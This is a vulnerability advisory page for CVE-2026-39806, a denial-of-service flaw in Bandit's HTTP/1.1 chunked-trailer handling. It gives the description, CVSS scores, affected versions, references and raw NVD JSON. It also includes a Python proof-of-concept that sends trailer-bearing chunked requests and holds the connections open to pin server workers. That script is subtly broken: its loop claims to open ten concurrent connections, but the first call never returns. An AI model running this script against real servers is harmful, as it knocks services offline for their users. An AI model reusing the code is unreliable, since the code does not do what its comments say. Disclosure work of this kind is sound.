CVE-2026-39806

Description

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in mtrudel bandit allows unauthenticated remote denial of service via worker process exhaustion. 'Elixir.Bandit.HTTP1.Socket':do_read_chunked_data!/5 in lib/bandit/http1/socket.ex terminates only when the last-chunk line 0\r\n is followed immediately by the empty trailer line \r\n. RFC 9112 §7.1.2 permits zero or more trailer fields between them. When trailers are present, none of the match clauses fit: the catch-all arm computes a negative to_read, calls read_available!/2, receives <<>> on timeout, and tail-recurses with unchanged state. The worker process is pinned for the lifetime of the TCP connection. A handful of concurrent connections sending RFC-conformant chunked requests with trailer fields is sufficient to exhaust the Bandit worker pool and render the server unresponsive to all further traffic. No authentication, special headers, or large payload is required. Proxies such as NGINX and HAProxy legitimately forward trailer-bearing requests, so servers behind such proxies may be affected without any malicious client involvement. This issue affects bandit: from 1.6.1 before 1.11.1.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:mtrudel:bandit:*:*:*:*:*:*:*:* - VULNERABLE

Bandit >= 1.6.1, < 1.11.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import time

def send_exploit(target_host, target_port):
    # Construct a HTTP/1.1 request with chunked encoding and a trailer.
    # This triggers the infinite loop in Bandit < 1.11.1.
    payload = (
        "POST / HTTP/1.1\r\n"
        f"Host: {target_host}\r\n"
        "Transfer-Encoding: chunked\r\n"
        "\r\n"
        "5\r\n"
        "hello\r\n"
        "0\r\n"               # Last chunk marker
        "X-Malicious-Header: value\r\n" # The trailer that causes the bug
        "\r\n"                # Final CRLF
    )
    
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_host, target_port))
        s.send(payload.encode())
        print(f"[+] Exploit sent to {target_host}:{target_port}. Worker pinned.")
        # Keep the connection open to hold the worker process
        while True:
            time.sleep(1)
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    TARGET_HOST = "127.0.0.1"
    TARGET_PORT = 4000
    # Launch multiple concurrent connections to exhaust the worker pool
    for _ in range(10):
        send_exploit(TARGET_HOST, TARGET_PORT)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39806
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39806
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39806/
[4] VulDB https://vuldb.com/cve/CVE-2026-39806
[5] https://cna.erlef.org/cves/CVE-2026-39806.html
[6] https://github.com/mtrudel/bandit/commit/ae3520dfdbfab115c638f8c7f6f6b805db34e1ab
[7] https://github.com/mtrudel/bandit/security/advisories/GHSA-rf5q-vwxw-gmrf
[8] https://osv.dev/vulnerability/EEF-CVE-2026-39806
[9] https://github.com/mtrudel/bandit/security/advisories/GHSA-rf5q-vwxw-gmrf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39806", "sourceIdentifier": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "published": "2026-05-13T14:17:35.700", "lastModified": "2026-05-21T15:23:08.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in mtrudel bandit allows unauthenticated remote denial of service via worker process exhaustion.\n\n'Elixir.Bandit.HTTP1.Socket':do_read_chunked_data!/5 in lib/bandit/http1/socket.ex terminates only when the last-chunk line 0\\r\\n is followed immediately by the empty trailer line \\r\\n. RFC 9112 §7.1.2 permits zero or more trailer fields between them. When trailers are present, none of the match clauses fit: the catch-all arm computes a negative to_read, calls read_available!/2, receives <<>> on timeout, and tail-recurses with unchanged state. The worker process is pinned for the lifetime of the TCP connection.\n\nA handful of concurrent connections sending RFC-conformant chunked requests with trailer fields is sufficient to exhaust the Bandit worker pool and render the server unresponsive to all further traffic. No authentication, special headers, or large payload is required. Proxies such as NGINX and HAProxy legitimately forward trailer-bearing requests, so servers behind such proxies may be affected without any malicious client involvement.\n\nThis issue affects bandit: from 1.6.1 before 1.11.1."}], "metrics": {"cvssMetricV40": [{"source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-835"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mtrudel:bandit:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.6.1", "versionEndExcluding": "1.11.1", "matchCriteriaId": "4C7F13C2-7993-4309-BCAE-8548A08F9D5E"}]}]}], "references": [{"url": "https://cna.erlef.org/cves/CVE-2026-39806.html", "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/mtrudel/bandit/commit/ae3520dfdbfab115c638f8c7f6f6b805db34e1ab", "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "tags": ["Patch"]}, {"url": "https://github.com/mtrudel/bandit/security/advisories/GHSA-rf5q-vwxw-gmrf", "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://osv.dev/vulnerability/EEF-CVE-2026-39806", "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/mtrudel/bandit/security/advisories/GHSA-rf5q-vwxw-gmrf", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}